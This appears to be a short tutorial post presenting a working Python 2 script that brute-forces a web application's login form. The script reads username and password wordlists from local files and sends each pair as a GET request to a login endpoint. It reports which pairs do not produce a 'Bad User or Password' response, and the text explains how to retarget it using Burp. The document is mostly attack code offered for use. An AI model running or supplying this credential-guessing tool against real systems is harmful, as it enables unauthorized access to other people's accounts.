Web for login bruteforce

This tool will bruteforce on a given http web application form based user password input.

user name and password will grab from the files that have opened using fp and fd variables. Just put the user name list and password list path on the fp and fd in order.

IP should be change in to your instance it may be a host name also.

var2 variable is the location or page that we are going to attack in the host we have mention above. So its the request to the server.

be notice in "if "Bad User or Password" in reple" This should be change in accordance to the response you get back

It is very easy to grab what should be the request and what would be the response by using burpsuit proxy. Using it examine the http transactions and decide what they could be.

import httplib

def sendreq(username, password):

var2 = "/System.xml?action=login&user="+username+"&password="+password

req = httplib.HTTPConnection("192.168.8.100")

req.putrequest("GET",var2)

req.putheader("Host","192.168.8.100")

req.endheaders()

req.send("")

rep = req.getresponse()

#print (headers)

#print statusmsg

bdrep = rep.read()

return bdrep

done = False

#(stauscode, statusmsg, headers)= req.getreply()

fp = open("/home/avishka/Documents/ulist.txt","r")

fd = open("/home/avishka/Documents/plist.txt","r")

uname = []

passls = []

for line in fp:

print line

uname.append(line.rstrip())

for line in fd:

print line

passls.append(line.rstrip())

for unfl in uname:

for passfl in passls:

reple = sendreq(unfl, passfl)

if "Bad User or Password" in reple:

print "user name : "+unfl+" password : "+passfl+" wrong"

else:

print "user name : "+unfl+" password : "+passfl+ " Worked"

done = True